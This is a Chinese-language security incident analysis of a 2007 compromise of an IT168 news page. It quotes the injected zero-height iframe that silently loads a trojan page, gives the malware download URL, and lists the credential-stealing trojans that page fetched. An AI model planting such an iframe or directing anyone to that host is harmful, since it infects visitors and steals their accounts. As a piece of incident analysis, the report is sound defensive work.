一、事件分析：

  　页面：http://publish.it168.com/2007/0823/20070823024601.shtml被插入如下代码，用以激活木马页面连接：
<iframe src="20070823024601_files/a.htm" frameborder="0" height="0" width="100"></iframe>，其中a.htm内嵌了
a_data/index.htm页面，index页面为木马页面。当用户浏览了挂马页面后就会自动下载病毒并运行。

被挂马的页面截图：

a.htm代码截图：

index.htm截图：

解密后的index.htm：


　　 下载的病毒地址为：http://web.haom.us/10001/vip.exe，此病毒会下载大量的病毒并运行。下载的大部分
为Trojan-Spy.Win32.Delf家族的木马。如：
　　     木马程序 Trojan-Spy.Win32.Delf.uv 文件: 10.exe
　　     木马程序 Trojan-Spy.Win32.Delf.uv 文件: 11.exe
　　     木马程序 Trojan-Spy.Win32.Delf.uv 文件: 12.exe
　　     木马程序 Trojan-Spy.Win32.Delf.uv 文件: 13.exe
　　     木马程序 Trojan-Spy.Win32.Delf.uv 文件: 14.exe
　　     木马程序 Trojan-Spy.Win32.Delf.uv 文件: 15.exe
　　     木马程序 Trojan-Spy.Win32.Delf.uv 文件: 16.exe
　　     木马程序 Trojan-Spy.Win32.Delf.uv 文件: 18.exe
　　     木马程序 Trojan-Spy.Win32.Delf.abi 文件: 19.exe
　　     木马程序 Trojan-PSW.Win32.Nilage.bkl 文件: 2.exe
　　     木马程序 Trojan-Spy.Win32.Delf.uv 文件: 20.exe
　　     木马程序 Trojan-Spy.Win32.Delf.uv 文件: 4.exe
　　     木马程序 Trojan-Spy.Win32.Delf.abi 文件: 5.exe
　　     木马程序 Trojan-Downloader.Win32.Agent.csd 文件: 6.exe
　　     木马程序 Trojan-Spy.Win32.Delf.abi 文件: 7.exe
　　     木马程序 Trojan-Spy.Win32.Delf.uv 文件: 8.exe
　　     木马程序 Trojan-PSW.Win32.OnLineGames.akj 文件: 9.exe

　　 他们运行后将监视用户系统，窃取用户的QQ账号/网游账号等。其中一部分木马做了免杀处理以逃避杀毒软件的查杀。

关于IT168(引自官方)：
中国指导IT产品采购的知名媒体品牌，是国内最大、最权威的导购资讯网站。自1999年创立以来，IT168以鲜明的定位、专业到位的服务，成为个人以及企业用户获取IT产品信息、商家资料、导购资讯首选的网络媒体。几年来，IT168促进了IT产品的流通以及IT市场的发展，也已在用户以及商家之间形成巨大的影响力，其综合竞争实力位居国内IT网站的前列。同时，IT168不断优化，持续以强势的资源优势为用户带来全面的导购感受。